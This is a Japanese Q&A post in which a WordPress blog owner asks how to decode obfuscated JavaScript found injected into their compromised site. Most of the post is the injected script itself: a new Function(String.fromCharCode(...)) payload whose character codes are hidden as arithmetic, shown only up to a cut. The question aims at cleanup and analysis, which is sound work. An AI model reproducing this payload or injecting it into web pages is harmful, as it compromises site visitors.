# String.fromCharCode で難読化された JavaScript の解読方法を教えてください

Tags: javascript

WordPressのアップデートをしていないブログのソースコードが改竄されています。難読化されたJavascriptが書き込まれています。

```
<div id="main"><script type='text/javascript'>(new Function(String.fromCharCode(19 - 9, 126 - 8, 100 - 3, 122 - 8, 37 - 5, 109 - 2, 104 - 3, 129 - 8, 36 - 4, 67 - 6, 34 - 2, 41 - 2, 106 - 2, 113 - 9, 94 - 8, 123 - 9, 123 - 2, 83 - 4, 130 - 9, 94 - 9, 112 - 2, 80 - 7, 43 - 4, 64 - 5, 15 - 5, 119 - 1, 104 - 7, 122 - 8, 38 - 6, 102 - 1, 111 - 1, 106 - 7, 108 - 7, 109 - 9, 35 - 3, 63 - 2, 41 - 9, 48 - 9, 85 - 4, 74 - 9, 60 - 8, 114 - 8, 76 - 4, 67 - 1, 119 - 8, 57 - 2, 78 - 9, 73 - 5, 118 - 7, 70 - 5, 100 - 3, 89 - 8, 111 - 4, 101 - 3, 86 - 9, 112 - 4, 113 - 1, 84 - 3, 106 - 8, 125 - 6, 76 - 2, 110 - 8, 89 - 5, 112 - 3, 115 - 8, 105 - 4, 68 - 1, 88 - 5, 83 - 1, 85 - 2, 71 - 3, 112 - 8, 74 - 9, 92 - 6, 80 - 1, 107 - 4, 53 - 5, 120 - 9, 80 - 8, 69 - 4, 72 - 3, 56 - 3, 81 - 9, 71 - 1, 117 - 9, 125 - 4, 96 - 9, 91 - 3, 81 - 8, 80 - 9, 81 - 1, 87 - 5, 123 - 4, 91 - 2, 102 - 4, 72 - 2, 51 - 2, 93 - 6, 86 - 7, 82 - 1, 71 - 6, 63 - 6, 78 - 7, 126 - 5, 123 - 7, 80 - 9, 76 - 9, 131 - 9, 114 - 7, 110 - 8, 92 - 6, 106 - 1, 128 - 9, 81 - 6, 78 - 4, 108 - 1, 75 - 6, 115 - 2, 72 - 1, 121 - 1, 122 - 6, 55 - 2, 94 - 8, 87 - 2, 83 - 9, 71 - 1, 91 - 4, 93 - 5, 91 - 6, 92 - 3, 83 - 8, 67 - 1, 117 - 5, 80 - 7, 86 - 8, 90 - 8, 49 - 1, 95 - 8, 76 - 2, 72 - 6, 70 - 5, 125 - 6, 93 - 9, 117 - 7, 86 - 4, 79 - 6, 87 - 3, 123 - 2, 64 - 8, 119 - 5, 78 - 9, 125 - 3, 57 - 9, 91 - 2, 91 - 2, 91 - 7, 59 - 7, 81 - 6, 68 - 1, 58 - 9, 70 - 5, 59 - 2, 75 - 3, 131 - 9, 116 - 1, 81 - 9, 81 - 9, 70 - 3, 93 - 4, 102 - 2, 107 - 6, 68 - 3, 75 - 6, 76 - 1, 104 - 5, 92 - 7, 109 - 1, 127 - 5, 85 - 3, 94 - 8, 114 - 6, 54 - 5, 74 - 7, 71 - 3, 127 - 8, 73 - 2, 73 - 6, 123 - 2, 82 - 9, 105 - 7, 76 - 6, 106 - 1, 73 - 3, 95 - 5, 82 - 8, 105 - 1, 112 - 1, 116 - 5, 77 - 6, 109 - 5, 129 - 9, 44 - 1, 88 - 1, 57 - 8, 112 - 5, 56 - 8, 102 - 3, 56 - 5, 94 - 8, 82 - 3, 100 - 3, 89 - 4, 104 - 1, 105 - 4, 82 - 4, 122 - 3, 68 - 2, 97 - 7, 77 - 1, 67 - 1, 93 - 4, 62 - 8, 68 - 2, 90 - 7, 73 - 8, 80 - 2, 74 - 3, 60 - 9, 98 - 8, 84 - 4, 88 - 1, 88 - 5, 118 - 3, 95 - 8, 79 - 1, 111 - 7, 121 - 6, 109 - 2, 77 - 9, 87 - 6, 96 - 7, 106 - 1, 94 - 6, 74 - 8, 116 - 5, 109 - 6, 75 - 5, 113 - 7, 58 - 6, 77 - 5, 84 - 8, 70 - 1, 108 - 5, 89 - 4, 76 - 1, 114 - 6, 78 - 4, 105 - 4, 104 - 7, 77 - 8, 81 - 7, 106 - 4, 88 - 4, 110 - 1, 109 - 1, 80 - 7, 86 - 3, 70 - 2, 63 - 7, 89 - 4, 92 - 5, 89 - 2, 107 - 8, 106 - 9, 82 - 3, 105 - 2, 72 - 3, 113 - 8, 70 - 5, 85 - 4, 49 - 1, 109 - 1, 94 - 6, 69 - 3, 69 - 4, 107 - 3, 80 - 8, 87 - 3, 68 - 3, 95 - 8, 73 - 7, 112 - 9, 62 - 9, 68 - 3, 85 - 7, 86 - 4, 53 - 5, 89 - 2, 83 - 9, 68 - 2, 68 - 3, 120 - 1, 85 - 3, 54 - 4, 114 - 6, 79 - 5, 92 - 6, 96 - 9, 124 - 8, 91 - 8, 88 - 2, 81 - 9, 60 - 7, 87 - 6, 106 - 6, 88 - 6, 91 - 5, 72 - 4, 84 - 1, 77 - 8, 109 - 5, 59 - 9, 93 - 8, 111 - 3, 109 - 1, 125 - 7, 72 - 5, 123 - 1, 70 - 5, 101 - 4, 85 - 5, 74 - 8, 119 - 8, 74 - 3, 107 - 9, 90 - 2, 113 - 9, 96 - 6, 102 - 4, 54 - 5, 110 - 2, 54 - 5, 74 - 5, 55 - 7, 83 - 5, 77 - 4, 84 - 1, 77 - 5, 93 - 3, 84 - 1, 73 - 4, 74 - 7, 111 - 3, 92 - 2, 107 - 5, 87 - 6, 55 - 7, 110 - 1, 69 - 3, 121 - 2, 86 - 9, 53 - 6, 73 - 3, 120 - 1, 114 - 2, 109 - 5, 78 - 9, 70 - 2, 119 - 4, 77 - 2, 85 - 9, 68 - 2, 71 - 6, 118 - 8, 78 - 1, 72 - 2, 116 - 4, 110 - 9, 82 - 3, 66 - 1, 116 - 8, 55 - 3, 76 - 4, 91 - 8, 122 - 3, 104 - 5, 81 - 9, 73 - 5, 58 - 2, 107 - 8, 75 - 3, 111 - 5, 123 - 3, 108 - 7, 103 - 1, 76 - 7, 54 - 1, 116 - 5, 88 - 2, 91 - 5, 90 - 4, 52 - 2, 93 - 5, 53 - 5, 113 - 9, 114 - 5, 88 - 1, 91 - 8, 59 - 6, 112 - 5, 100 - 3, 89 - 4, 113 - 9, 80 - 7, 104 - 4, 113 - 5, 75 - 1, 98 - 8, 85 - 5, 86 - 4, 121 - 2, 105 - 1, 75 - 4, 131 - 9, 121 - 6, 77 - 6, 89 - 4, 50 - 1, 122 - 2, 87 - 4, 92 - 5, 88 - 1, 60 - 3, 92 - 2, 81 - 6, 78 - 7, 89 - 7, 117 - 5, 87 - 4, 73 - 4, 112 - 8, 55 - 5, 75 - 4, 123 - 3, 60 - 3, 123 - 5, 86 - 1, 88 - 4, 115 - 8, 72 - 6, 82 - 7, 107 - 4, 115 - 8, 74 - 5, 74 - 8, 89 - 8, 96 - 7, 92 - 5, 85 - 5, 89 - 7, 108 - 5, 124 - 3, 71 - 4, 58 - 8, 105 - 6, 87 - 7, 70 - 2, 85 - 2, 77 - 4, 56 - 1, 77 - 9, 87 - 4, 116 - 5, 93 - 8, 109 - 7, 85 - 4, 55 - 7, 112 - 3, 75 - 9, 127 - 8, 79 - 2, 48 - 1, 73 - 3, 55 - 6, 68 - 2, 122 - 4, 83 - 1, 77 - 6, 108 - 4, 87 - 3, 102 - 5, 88 - 3, 64 - 7, 93 - 3, 108 - 9, 90 - 4, 122 - 6, 93 - 3, 80 - 2, 77 - 5, 84 - 6, 52 - 3, 89 - 5, 110 - 1, 116 - 8, 76 - 3, 88 - 5, 73 - 1, 97 - 8, 71 - 6, 76 - 4, 75 - 7, 123 - 8, 84 - 7, 78 - 4, 124 - 5, 71 - 5, 129 - 8, 91 - 2, 108 - 1, 107 - 3, 54 - 4, 92 - 7, 111 - 3, 113 - 6, 130 - 9, 102 - 3, 60 - 9, 94 - 8, 88 - 9, 104 - 7, 87 - 2, 104 - 1, 103 - 2, 82 - 4, 123 - 4, 67 - 1, 94 - 4, 82 - 3, 111 - 7, 109 - 6, 123 - 2, 71 - 4, 127 - 6, 106 - 7, 106 - 7, 88 - 5, 77 - 6, 120 - 4, 87 - 4, 75 - 5, 130 - 9, 53 - 1, 87 - 7, 87 - 7, 67 - 2, 114 - 7, 116 - 5, 74 - 2, 68 - 3, 100 - 1, 113 - 6, 93 - 5, 68 - 3, 127 - 8, 61 - 5, 81 - 9, 73 - 6, 102 - 3, 125 - 7, 77 - 1, 109 - 6, 52 - 4, 79 - 8, 81 - 8, 108 - 1, 112 - 4, 130 - 8, 102 - 4, 52 - 3, 117 - 9, 53 - 4, 85 - 1, 114 - 9, 72 - 7, 82 - 3, 90 - 7, 76 - 4, 55 - 2, 93 - 9, 71 - 3, 68 - 1, 54 - 2, 108 - 7, 82 - 5, 69 - 4, 66 - 1, 66 - 9, 87 - 6, 92 - 7, 111 - 8, 118 - 2, 102 - 1, 79 - 9, 117 - 9, 124 - 6, 94 - 7, 91 - 3, 87 - 1, 85 - 6, 102 - 5, 88 - 6, 113 - 2, 80 - 2, 74 - 1, 112 - 9, 104 - 5, 84 - 8, 77 - 4, 89 - 4, 79 - 5, 108 - 6, 85 - 1, 113 - 4, 114 - 6, 74 - 1, 90 - 7, 75 - 8, 120 - 4, 60 - 8, 106 - 7, 52 - 2, 61 - 4, 93 - 3, 107 - 7, 88 - 3, 57 - 5, 61 - 5, 74 - 7, 88 - 7, 58 - 2, 130 - 8, 74 - 2, 66 - 1, 56 - 7, 124 - 6, 88 - 6, 78 - 6, 92 - 7, 105 - 7, 83 - 8, 67 - 2, 65 - 9, 80 - 2, 82 - 3, 74 - 9, 99 - 9, 90 - 2, 80 - 1, 121 - 1, 96 - 7, 91 - 1, 68 - 3, 92 - 8, 60 - 8, 79 - 1, 73 - 2, 110 - 6, 93 - 8, 86 - 2, 71 - 4, 112 - 7, 119 - 7, 91 - 9, 109 - 7, 75 - 5, 92 - 6, 76 - 8, 89 - 6, 78 - 9, 113 - 9, 58 - 8, 88 - 3, 111 - 7, 66 - 1, 113 - 1, 94 - 7, 92 - 4, 49 - 1, 107 - 9, 78 - 3, 68 - 3, 60 - 4, 87 - 9, 87 - 8, 69 - 4, 91 - 1, 97 - 9, 77 - 3, 113 - 9, 104 - 5, 124 - 4, 76 - 9, 123 - 1, 70 - 1, 119 - 9, 76 - 8, 116 - 6, 59 - 6, 93 - 7, 79 - 7, 107 - 2, 66 - 1, 91 - 4, 82 - 5, 104 - 1, 82 - 9, 118 - 3, 92 - 8, 51 - 3, 77 - 7, 51 - 1, 87 - 2, 49 - 1, 85 - 3, 128 - 7, 91 - 4, 91 - 3, 111 - 7, 108 - 6, 87 - 6, 51 - 3, 109 - 5, 78 - 5, 109 - 9, 115 - 7, 83 - 9, 94 - 4, 99 - 1, 50 - 1, 110 - 2, 54 - 5, 76 - 7, 115 - 9, 88 - 2, 78 - 5, 73 - 1, 86 - 2, 101 - 2, 89 - 3, 73 - 1, 71 - 4, 72 - 3, 79 - 1, 107 - 6, 121 - 2, 105 - 6, 114 - 4, 77 - 9, 73 - 8, 50 - 2, 122 - 5, 81 - 1, 88 - 6, 62 - 5, 115 - 5, 96 - 8, 109 - 3, 107 - 8, 68 - 2, 85 - 5, 86 - 1, 61 - 4, 67 - 1, 106 - 6, 116 - 8, 83 - 5, 74 - 5, 100 - 1, 110 - 2, 115 - 7, 54 - 2, 97 - 9, 49 - 1, 83 - 5, 74 - 1, 87 - 4, 78 - 6, 97 - 7, 88 - 5, 89 - 2, 94 - 7, 64 - 7, 95 - 5, 107 - 7, 85 - 3, 74 - 1, 58 - 9, 85 - 2, 73 - 7, 49 - 1, 58 - 7, 77 - 7, 90 - 8, 123 - 4, 106 - 2, 75 - 7, 89 - 1, 116 - 1, 78 - 6, 78 - 4, 123 - 4, 120 - 1, 79 - 1, 82 - 6, 112 - 6, 49 - 1, 109 - 7, 95 - 5, 57 - 8, 57 - 5, 56 - 6, 75 - 3, 72 - 5, 111 - 8, 108 - 6, 73 - 7, 75 - 3, 75 - 5, 99 - 1, 94 - 7, 91 - 4, 56 - 3, 77 - 8, 103 - 6, 74 - 5, 55 - 2, 115 - 8, 96 - 9, 91 - 4, 82 - 8, 56 - 6, 93 - 8, 116 - 8, 116 - 8, 123 - 5, 92 - 5, 93 - 5, 95 - 9, 80 - 1, 101 - 4, 83 - 1, 85 - 4, 94 - 9, 106 - 6, 108 - 5, 104 - 5, 97 - 8, 79 - 4, 72 - 6, 120 - 1, 62 - 7, 80 - 9, 113 - 4, 102 - 3, 71 - 5, 74 - 8, 112 - 6, 82 - 9, 92 - 4, 69 - 4, 84 - 3, 73 - 8, 104 - 2, 105 - 3, 88 - 3, 111 - 4, 119 - 5, 66 - 1, 84 - 3, 97 - 8, 128 - 8, 88 - 2, 92 - 6, 71 - 5, 127 - 9, 88 - 1, 72 - 1, 111 - 7, 87 - 3, 100 - 3, 87 - 2, 89 - 3, 94 - 4, 91 - 3, 77 - 7, 79 - 5, 98 - 8, 106 - 8, 53 - 4, 112 - 4, 52 - 3, 85 - 1, 110 - 1, 116 - 8, 80 - 7, 76 - 6, 72 - 5, 118 - 6, 88 - 5, 77 - 9, 68 - 1, 56 - 4, 102 - 1, 84 - 7, 72 - 7, 72 - 7, 61 - 4, 84 - 2, 108 - 5, 72 - 3, 53 - 1, 79 - 9, 113 - 9, 120 - 1, 56 - 5, 86 - 8, 110 - 4, 83 - 5, 72 - 1, 105 - 7, 107 - 3, 76 - 7, 76 - 2, 86 - 6, 108 - 4, 50 - 2, 95 - 8, 101 - 4, 78 - 8, 69 - 3, 58 - 9, 85 - 1, 52 - 1, 90 - 8, 89 - 3, 88 - 5, 74 - 2, 120 - 4, 75 - 7, 89 - 4, 75 - 4, 65 - 9, 76 - 9, 91 - 3, 49 - 1, 56 - 3, 119 - 7, 88 - 5, 74 - 5, 105 - 1, 51 - 1, 87 - 2, 110 - 7, 123 - 8, 114 - 1, 69 - 1, 85 - 2, 73 - 8, 101 - 2, 81 - 7, 52 - 3, 82 - 4, 110 - 5, 101 - 1, 111 - 3, 76 - 2, 91 - 1, 105 - 7, 121 - 2, 87 - 5, 109 - 7, 93 - 3, 72 - 1, 117 - 9, 78 - 5, 89 - 6, 78 - 6, 96 - 7, 73 - 7, 80 - 8, 73 - 5, 123 - 8, 120 - 4, 83 - 3, 72 - 7, 78 - 1, 122 - 7, 70 - 4, 129 - 9, 52 - 4, 106 - 1, 92 - 5, 105 - 1, 63 - 7, 59 - 5, 71 - 1, 124 - 2, 97 - 8, 99 - 2, 82 - 9, 68 - 3, 100 - 1, 78 - 7, 105 - 3, 112 - 4, 119 - 3, 91 - 1, 84 - 6, 76 - 4, 86 - 8, 58 - 9, 91 - 7, 113 - 4, 117 - 9, 77 - 4, 91 - 8, 80 - 8, 90 - 1, 67 - 1, 75 - 3, 72 - 4, 122 - 7, 62 - 8, 87 - 8, 110 - 7, 78 - 9, 111 - 6, 69 - 4, 85 - 4, 51 - 2, 49 - 6, 77 - 8, 83 - 1, 98 - 9, 107 - 4, 71 - 2, 113 - 7, 125 - 6, 80 - 4, 94 - 4, 92 - 7, 113 - 9, 84 - 4, 93 - 3, 51 - 3, 73 - 7, 81 - 6, 106 - 9, 76 - 6, 89 - 3, 54 - 5, 88 - 1, 89 - 1, 120 - 8, 95 - 6, 85 - 4, 96 - 9, 54 - 5, 60 - 8, 94 - 7, 94 - 7, 66 - 9, 95 - 5, 106 - 6, 93 - 8, 59 - 6, 118 - 6, 68 - 2, 67 - 2, 106 - 7, 53 - 4, 73 - 4, 127 - 7, 91 - 6, 103 - 4, 76 - 8, 91 - 7, 117 - 6, 101 - 2, 77 - 2, 72 - 7, 60 - 4, 85 - 7, 104 - 3, 74 - 9, 75 - 6, 108 - 9, 82 - 3, 130 - 8, 72 - 7, 107 - 3, 76 - 9, 129 - 8, 84 - 2, 73 - 8, 74 - 7, 123 - 1, 108 - 1, 105 - 5, 75 - 6, 107 - 2, 98 - 9, 106 - 7, 104 - 3, 88 - 3, 61 - 8, 121 - 4, 90 - 3, 91 - 6, 59 - 2, 48 - 1, 88 - 5, 95 - 7, 85 - 7, 126 - 8, 92 - 5, 89 - 1, 88 - 2, 87 - 8, 102 - 5, 94 - 9, 111 - 8, 105 - 3, 86 - 6, 128 - 8, 121 - 2, 105 - 5, 78 - 5, 67 - 2, 55 - 2, 63 - 8, 74 - 9, 111 - 6, 91 - 2, 78 - 2, 68 - 1, 87 - 4, 74 - 1, 103 - 5, 79 - 9, 106 - 1, 78 - 8, 95 - 5, 99 - 2, 76 - 7, 61 - 9, 45 - 2, 86 - 8, 122 - 3, 85 - 4, 61 - 8, 75 - 6, 89 - 7, 111 - 8, 59 - 4, 70 - 1, 74 - 6, 117 - 6, 71 - 6, 106 - 7, 117 - 8, 77 - 3, 82 - 9, 102 - 2, 114 - 6, 81 - 7, 95 - 5, 80 - 3, 112 - 4, 94 - 8, 53 - 4, 93 - 5, 76 - 4, 116 - 8, 80 - 7, 88 - 7, 117 - 7, 96 - 6, 74 - 6, 86 - 3, 93 - 5, 60 - 3, 77 - 3, 109 - 7, 72 - 2, 95 - 9, 72 - 4, 92 - 9, 71 - 2, 112 - 9, 115 - 1, 107 - 6, 76 - 6, 112 - 4, 127 - 9, 81 - 9, 129 - 8, 70 - 5, 69 - 4, 81 - 6, 105 - 1, 123 - 4, 71 - 5, 83 - 4, 86 - 4, 128 - 8, 92 - 2, 84 - 4, 70 - 4, 125 - 6, 106 - 2, 82 - 6, 88 - 5, 97 - 8, 73 - 1, 67 - 2, 124 - 2, 61 - 5, 96 - 8, 86 - 1, 89 - 6, 127 - 8, 112 - 3, 85 - 6, 127 - 8, 60 - 4, 111 - 4, 74 - 6, 88 - 3, 83 - 1, 54 - 4, 75 - 9, 75 - 9, 109 - 6, 114 - 8, 74 - 6, 69 - 1, 69 - 3, 71 - 4, 101 - 4, 85 - 4, 54 - 6, 90 - 9, 84 - 7, 106 - 2, 82 - 5, 74 - 9, 89 - 9, 76 - 6, 70 - 4, 54 - 5, 74 - 4, 92 - 7, 81 - 3, 75 - 2, 86 - 3, 77 - 5, 96 - 6, 85 - 2, 73 - 5, 125 - 4, 57 - 5, 81 - 5, 105 - 5, 84 - 3, 117 - 2, 121 - 1, 77 - 9, 67 - 2, 112 - 5, 106 - 1, 74 - 4, 54 - 5, 116 - 8, 130 - 9, 93 - 6, 91 - 7, 117 - 2, 82 - 6, 88 - 8, 115 - 8, 111 - 8, 121 - 6, 85 - 7, 120 - 1, 95 - 6, 105 - 6, 97 - 7, 53 - 4, 75 - 9, 125 - 8, 96 - 6, 77 - 6, 110 - 2, 78 - 5, 89 - 6, 78 - 6, 93 - 4, 94 - 6, 68 - 3, 87 - 4, 123 - 8, 97 - 8, 80 - 7, 88 - 7, 120 - 4, 113 - 3, 80 - 9, 125 - 6, 52 - 4, 112 - 7, 84 - 6, 111 - 7, 109 - 6, 60 - 5, 79 - 7, 79 - 7, 55 - 7, 79 - 3, 83 - 6, 89 - 8, 121 - 2, 83 - 9, 74 - 1, 112 - 8, 103 - 3, 95 - 7, 82 - 7, 73 - 7, 126 - 7, 107 - 3, 80 - 5, 114 - 9, 104 - 1, 104 - 5, 71 - 3, 90 - 2, 61 - 8, 100 - 2, 92 - 5, 88 - 1, 91 - 9, 94 - 4, 80 - 3, 72 - 6, 94 - 5, 120 - 4, 76 - 9, 90 - 8, 75 - 6, 116 - 8, 95 - 8, 53 - 5, 82 - 8, 71 - 1, 88 - 1, 95 - 7, 90 - 4, 82 - 3, 98 - 1, 86 - 4, 53 - 1, 80 - 6, 79 - 5, 78 - 8, 74 - 1, 99 - 2, 74 - 5, 67 - 2, 65 - 9, 56 - 8, 73 - 8, 108 - 2, 125 - 6, 85 - 7, 85 - 2, 75 - 4, 123 - 7, 91 - 8, 74 - 2, 76 - 8, 126 - 7, 100 - 3, 82 - 4, 73 - 7, 54 - 2, 119 - 4, 82 - 1, 73 - 7, 59 - 7, 52 - 1, 78 - 6, 106 - 3, 124 - 5, 117 - 4, 93 - 8, 77 - 5, 92 - 6, 73 - 3, 102 - 5, 89 - 4, 74 - 8, 67 - 2, 81 - 4, 121 - 2, 119 - 8, 109 - 9, 79 - 3, 108 - 5, 69 - 4, 112 - 3, 89 - 5, 112 - 2, 88 - 6, 93 - 7, 92 - 9, 71 - 3, 106 - 3, 80 - 8, 71 - 1, 86 - 3, 84 - 6, 88 - 7, 105 - 5, 95 - 9, 71 - 1, 120 - 8, 86 - 2, 56 - 8, 65 - 8, 55 - 5, 89 - 6, 75 - 5, 110 - 2, 116 - 5, 90 - 9, 119 - 9, 93 - 8, 78 - 2, 84 - 7, 86 - 4, 108 - 5, 74 - 8, 76 - 2, 73 - 7, 102 - 3, 79 - 4, 101 - 2, 117 - 9, 56 - 3, 58 - 9, 85 - 3, 90 - 3, 110 - 3, 81 - 3, 77 - 8, 71 - 3, 78 - 5, 86 - 2, 72 - 4, 85 - 2, 119 - 7, 93 - 5, 77 - 4, 90 - 9, 70 - 1, 103 - 4, 89 - 9, 69 - 2, 120 - 5, 79 - 9, 75 - 9, 107 - 4, 124 - 9, 110 - 1, 76 - 6, 131 - 9, 75 - 1, 73 - 2, 90 - 1, 71 - 2, 73 - 3, 90 - 6, 93 - 5, 73 - 3, 77 - 3, 99 - 9, 101 - 3, 58 - 9, 109 - 2, 122 - 2, 66 - 1, 87 - 4, 119 - 8, 107 - 7, 74 - 8, 86 - 2, 81 - 4, 100 - 1, 76 - 8, 92 - 5, 77 - 8, 104 - 7, 84 - 5, 108 - 5, 73 - 4, 106 - 1, 73 - 8, 86 - 5, 53 - 4, 55 - 5, 85 - 1, 57 - 8, 112 - 5, 122 - 7, 83 - 9, 110 - 4, 124 - 9, 85 - 5, 76 - 2, 71 - 6, 56 - 7, 82 - 9, 106 - 4, 92 - 6, 82 - 8, 104 - 3, 102 - 3, 110 - 2, 62 - 9, 57 - 8, 83 - 1, 92 - 5, 109 - 2, 83 - 7, 83 - 5, 127 - 6, 67 - 2, 91 - 7, 77 - 7, 92 - 8, 113 - 2, 105 - 6, 106 - 8, 116 - 7, 91 - 9, 118 - 6, 86 - 3, 69 - 3, 93 - 7, 104 - 5, 110 - 9, 71 - 1, 116 - 8, 121 - 3, 69 - 1, 127 - 5, 82 - 1, 104 - 5, 98 - 1, 91 - 9, 112 - 1, 80 - 2, 82 - 4, 124 - 4, 91 - 2, 72 - 7, 76 - 4, 74 - 9, 52 - 4, 49 - 1, 74 - 3, 111 - 6, 126 - 7, 122 - 8, 74 - 9, 69 - 1, 78 - 1, 84 - 2, 75 - 6, 108 - 5, 97 - 8, 94 - 6, 76 - 3, 88 - 7, 122 - 7, 56 - 1, 77 - 5, 108 - 5, 109 - 2, 61 - 7, 89 - 4, 108 - 1, 90 - 8, 122 - 4, 70 - 3, 111 - 5, 67 - 2, 98 - 1, 71 - 6, 70 - 5, 97 - 8, 108 - 9, 82 - 5, 126 - 7, 72 - 7, 84 - 4, 79 - 3, 110 - 6, 92 - 6, 61 - 4, 69 - 2, 70 - 2, 125 - 6, 77 - 6, 68 - 1, 126 - 5, 77 - 4, 107 - 9, 74 - 4, 109 - 4, 79 - 9, 89 - 7, 109 - 7, 74 - 5, 57 - 5, 127 - 6, 92 - 3, 114 - 7, 106 - 2, 54 - 4, 94 - 9, 117 - 9, 112 - 5, 110 - 1, 77 - 5, 54 - 3, 91 - 5, 76 - 5, 84 - 8, 82 - 1, 107 - 8, 78 - 2, 78 - 5, 126 - 6, 59 - 3, 104 - 5, 77 - 4, 83 - 2, 50 - 1, 57 - 2, 81 - 9, 69 - 2, 127 - 8, 78 - 4, 72 - 4, 73 - 6, 65 - 9, 109 - 5, 75 - 7, 92 - 9, 56 - 4, 80 - 2, 78 - 1, 76 - 7, 58 - 5, 56 - 8, 95 - 9, 88 - 2, 95 - 9, 51 - 1, 91 - 5, 90 - 8, 116 - 5, 104 - 1, 75 - 5, 76 - 9, 93 - 8, 69 - 2, 85 - 9, 73 - 7, 125 - 6, 80 - 2, 101 - 2, 93 - 5, 105 - 1, 96 - 6, 99 - 1, 50 - 1, 110 - 2, 58 - 9, 93 - 9, 116 - 7, 112 - 4, 79 - 6, 92 - 9, 69 - 2, 114 - 3, 83 - 4, 93 - 6, 87 - 4, 123 - 8, 94 - 7, 80 - 2, 111 - 7, 123 - 8, 114 - 7, 76 - 8, 87 - 6, 91 - 2, 107 - 2, 96 - 8, 70 - 5, 117 - 2, 120 - 7, 73 - 2, 73 - 5, 76 - 7, 94 - 6, 80 - 9, 105 - 1, 123 - 4, 83 - 9, 79 - 6, 110 - 6, 106 - 6, 98 - 8, 105 - 6, 114 - 7, 84 - 2, 56 - 7, 85 - 2, 84 - 1, 67 - 2, 79 - 8, 73 - 1, 73 - 5, 78 - 1, 74 - 9, 78 - 7, 68 - 1, 128 - 9, 82 - 4, 86 - 6, 69 - 3, 106 - 3, 124 - 9, 87 - 3, 50 - 2, 77 - 7, 56 - 6, 75 - 8, 90 - 2, 84 - 6, 121 - 3, 93 - 6, 91 - 3, 87 - 1, 80 - 1, 103 - 6, 93 - 8, 107 - 4, 80 - 4, 80 - 1, 105 - 1, 102 - 3, 93 - 4, 86 - 6, 93 - 9, 74 - 9, 57 - 2, 78 - 7, 109 - 4, 127 - 8, 98 - 1, 75 - 3, 115 - 9, 101 - 2, 110 - 9, 94 - 9, 87 - 3, 52 - 4, 106 - 7, 82 - 4, 71 - 6, 117 - 6, 125 - 6, 80 - 1, 121 - 1, 121 - 2, 59 - 8, 72 - 6, 105 - 1, 124 - 5, 86 - 9, 77 - 8, 91 - 7, 73 - 8, 80 - 2, 81 - 8, 109 - 4, 75 - 6, 79 - 8, 81 - 8, 112 - 8, 105 - 6, 82 - 6, 81 - 2, 89 - 7, 109 - 6, 61 - 8, 89 - 7, 59 - 8, 82 - 8, 107 - 2, 88 - 5, 76 - 4, 99 - 9, 92 - 9, 92 - 5, 92 - 5, 66 - 9, 96 - 6, 76 - 2, 111 - 7, 112 - 1, 116 - 5, 77 - 6, 111 - 7, 124 - 4, 52 - 9, 94 - 7, 55 - 7, 83 - 9, 73 - 3, 93 - 6, 89 - 1, 92 - 6, 87 - 8, 99 - 2, 90 - 8, 95 - 9, 113 - 8, 107 - 7, 114 - 6, 80 - 7, 70 - 1, 95 - 6, 58 - 9, 110 - 2, 115 - 8, 96 - 8, 114 - 5, 70 - 4, 88 - 4, 92 - 3, 116 - 8, 128 - 9, 83 - 3, 92 - 7, 96 - 9, 97 - 7, 87 - 6, 106 - 8, 111 - 2, 86 - 4, 70 - 2, 41 - 2, 61 - 2, 11 - 1, 108 - 6, 119 - 2, 117 - 7, 103 - 4, 117 - 1, 112 - 7, 113 - 2, 116 - 6, 33 - 1, 128 - 8, 114 - 3, 115 - 1, 102 - 7, 103 - 2, 113 - 3, 101 - 2, 49 - 9, 120 - 5, 117 - 1, 123 - 9, 110 - 5, 114 - 4, 109 - 6, 49 - 5, 41 - 9, 115 - 8, 107 - 6, 122 - 1, 49 - 8, 33 - 1, 131 - 8, 16 - 6, 41 - 9, 33 - 1, 123 - 5, 101 - 4, 115 - 1, 35 - 3, 117 - 3, 102 - 1, 118 - 3, 38 - 6, 62 - 1, 35 - 3, 48 - 9, 42 - 3, 67 - 8, 17 - 7, 34 - 2, 38 - 6, 109 - 7, 112 - 1, 116 - 2, 33 - 1, 44 - 4, 119 - 1, 100 - 3, 115 - 1, 36 - 4, 112 - 7, 40 - 8, 64 - 3, 41 - 9, 51 - 3, 63 - 4, 39 - 7, 108 - 3, 40 - 8, 63 - 3, 35 - 3, 119 - 4, 121 - 5, 123 - 9, 113 - 8, 113 - 3, 106 - 3, 47 - 1, 115 - 7, 108 - 7, 116 - 6, 110 - 7, 124 - 8, 107 - 3, 66 - 7, 34 - 2, 109 - 4, 46 - 3, 51 - 8, 43 - 2, 37 - 5, 127 - 4, 13 - 3, 41 - 9, 33 - 1, 33 - 1, 36 - 4, 118 - 4, 104 - 3, 120 - 5, 39 - 7, 52 - 9, 63 - 2, 37 - 5, 88 - 5, 124 - 8, 121 - 7, 111 - 6, 119 - 9, 109 - 6, 53 - 7, 105 - 3, 123 - 9, 117 - 6, 112 - 3, 72 - 5, 111 - 7, 105 - 8, 116 - 2, 71 - 4, 120 - 9, 105 - 5, 103 - 2, 49 - 9, 117 - 2, 122 - 6, 117 - 3, 106 - 1, 117 - 7, 107 - 4, 55 - 9, 101 - 2, 105 - 1, 100 - 3, 119 - 5, 69 - 2, 113 - 2, 103 - 3, 103 - 2, 73 - 8, 121 - 5, 49 - 9, 107 - 2, 47 - 6, 35 - 3, 103 - 9, 18 - 8, 33 - 1, 37 - 5, 34 - 2, 38 - 6, 36 - 4, 33 - 1, 37 - 5, 39 - 7, 35 - 3, 33 - 1, 35 - 3, 39 - 7, 39 - 7, 37 - 5, 38 - 6, 37 - 5, 35 - 3, 40 - 8, 40 - 8, 41 - 9, 36 - 4, 38 - 6, 41 - 9, 39 - 7, 37 - 5, 39 - 7, 41 - 9, 34 - 2, 33 - 1, 36 - 4, 37 - 5, 38 - 6, 111 - 4, 108 - 7, 123 - 2, 54 - 8, 101 - 2, 105 - 1, 101 - 4, 119 - 5, 70 - 3, 115 - 4, 102 - 2, 105 - 4, 68 - 3, 122 - 6, 49 - 9, 111 - 6, 39 - 7, 40 - 3, 35 - 3, 114 - 7, 104 - 3, 125 - 4, 48 - 2, 114 - 6, 102 - 1, 112 - 2, 104 - 1, 124 - 8, 113 - 9, 46 - 5, 47 - 6, 65 - 6, 11 - 1, 39 - 7, 39 - 7, 129 - 4, 12 - 2, 38 - 6, 37 - 5, 123 - 9, 102 - 1, 119 - 3, 119 - 2, 120 - 6, 112 - 2, 41 - 9, 122 - 8, 104 - 3, 117 - 2, 61 - 2, 13 - 3, 126 - 1, 13 - 3, 17 - 7, 126 - 8, 104 - 7, 115 - 1, 37 - 5, 104 - 4, 108 - 7, 100 - 1, 36 - 4, 69 - 8, 33 - 1, 128 - 8, 113 - 2, 120 - 6, 